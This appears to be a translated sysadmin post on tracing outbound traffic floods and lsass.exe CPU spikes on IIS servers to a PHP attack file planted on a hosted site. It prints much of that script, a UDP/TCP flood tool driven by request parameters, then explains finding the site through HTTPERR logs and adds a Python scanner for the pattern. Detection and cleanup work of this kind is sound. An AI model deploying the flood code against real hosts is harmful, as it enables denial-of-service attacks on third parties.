Recently, lsass.exe on several of our servers has been using far too much CPU. It is not constantly high: it spikes, returns to normal after a while, and then recurs, and this has been going on for weeks. While the CPU is high the hosted sites open very slowly.
During these spikes the network traffic also fluctuates, and outbound traffic sometimes unexpectedly reaches 30M-90M/s. That looks like an external attack, so that was the first thing we suspected. How do you check for it?
A typical outbound attack file looks like the one below; scripts of this kind can be found by searching online.
The script looks like this:
<?php
set_time_limit(86400);
ignore_user_abort(true);
$packets = 0;
$http = $_REQUEST['http'];
$rand = $_REQUEST['exit'];
$exec_time = $_REQUEST['time'];
........
echo $_REQUEST['rat'].$_SERVER["HTTP_HOST"]."|".gethostbyname($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_REQUEST['rat'];
exit;
}
echo "PHP Terminator";
exit;
}
for ($i = 0; $i < 65535; $i++)
{
$out .= "X";
}
........
}
$fp = fsockopen("udp://$http", $rand, $errno, $errstr, 5);
if ($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}
else
if ($rand == 500)
while (1)
{
$packets++;
if (time() > $max_time) {
break;
}
$fp = pfsockopen("udp://$http", $rand, $errno, $errstr, 5);
if ($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}
else
while (1)
{
$packets++;
if (time() > $max_time) {
break;
}
$fp = pfsockopen("tcp://$http", $rand, $errno, $errstr, 5);
if ($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}
?>
So how do you find out which site it is?
Open the HTTP.sys error log,
C:\Windows\System32\LogFiles\HTTPERR\httperr...log, choosing the file that covers today's date.
You will find records like this one:
2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13-http/1.1 445&TIME=120 503 783 Disabled 30_freehost_1
The last three fields, 783 Disabled 30_freehost_1, are what matter:
783 is the ID of this site in IIS;
30_freehost_1 is the application pool the site belongs to (and Disabled is the reason HTTP.sys answered with 503: that pool had been disabled).
Solution:
Once you have found the site, the rest is easy. If conditions allow, you can disable the fsockopen function outright, but in most cases that is not an option.
Then go to the root directory of this site and search for the following line:
$fp = fsockopen("udp://$http", $rand, $errno, $errstr, 5);
You can use a search tool to look for that exact line, or simply for "$fp = fsockopen", to locate the attack file wherever it has been hidden. Of course, do not delete legitimate files that use it to send mail. Finally, restart the service and the lag is gone.
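As an added example (not code from the original post), the Python helper below automates the two checks described above: it tallies HTTPERR entries by IIS site ID and application pool, and it scans a site root for PHP files that open a raw udp:// or tcp:// socket to a host taken from the request. The log lines, IP addresses and PHP fragments are constructed for the example; the column positions follow the HTTP.sys HTTPERR field order.

```python
"""Defender-side helpers: which IIS site/app pool is being hit, and which PHP
file in that site's root opens raw sockets to a caller-supplied host."""
import re
from collections import Counter
from pathlib import Path

# Constructed HTTPERR sample (documentation-range IPs, not real traffic).
# Columns follow the HTTP.sys format: date time c-ip c-port s-ip s-port
# cs-version cs-method cs-uri sc-status s-siteid s-reason s-queuename
SAMPLE_HTTPERR = """\
#Fields: date time c-ip c-port s-ip s-port cs-version cs-method cs-uri sc-status s-siteid s-reason s-queuename
2011-04-26 06:37:28 192.0.2.10 26817 198.51.100.5 80 HTTP/1.1 GET /a.php?time=120 503 783 Disabled 30_freehost_1
2011-04-26 06:37:29 192.0.2.10 26818 198.51.100.5 80 HTTP/1.1 GET /a.php?time=120 503 783 Disabled 30_freehost_1
2011-04-26 06:40:01 192.0.2.77 40001 198.51.100.5 80 HTTP/1.1 GET / 400 12 BadRequest -
"""

# Constructed PHP fragments: one resembling the flood script, one a normal mailer.
SUSPICIOUS_PHP = '$http = $_REQUEST["http"]; $fp = fsockopen("udp://$http", $rand, $errno, $errstr, 5);'
BENIGN_MAILER_PHP = '$fp = fsockopen("smtp.example.com", 25, $errno, $errstr, 10); fwrite($fp, "HELO");'

SOCKET_RE = re.compile(r'\bp?fsockopen\s*\(\s*["\'](?:udp|tcp)://\$', re.I)
INPUT_RE = re.compile(r'\$_(?:REQUEST|GET|POST)\b')


def site_hits(log_text):
    """Count HTTPERR entries per (s-siteid, s-queuename); '#' lines are headers."""
    hits = Counter()
    for line in log_text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#") or len(fields) < 13:
            continue
        hits[(fields[10], fields[12])] += 1  # s-siteid, s-queuename
    return hits


def flag_php(source):
    """Reasons a PHP source looks like the flood script (empty list = clean)."""
    reasons = []
    if SOCKET_RE.search(source):
        reasons.append("fsockopen/pfsockopen to udp:// or tcp:// with a variable host")
        if INPUT_RE.search(source):
            reasons.append("host or port comes from $_REQUEST/$_GET/$_POST")
    return reasons


def scan_site_root(root):
    """Walk the site root of the offending site ID and return {path: reasons}."""
    findings = {}
    for path in Path(root).rglob("*.php"):
        reasons = flag_php(path.read_text(errors="ignore"))
        if reasons:
            findings[str(path)] = reasons
    return findings
```

Run site_hits over the day's httperr log first, then scan_site_root over the root of the site whose ID tops the tally; a plain mailer that opens an SMTP host by name is not flagged.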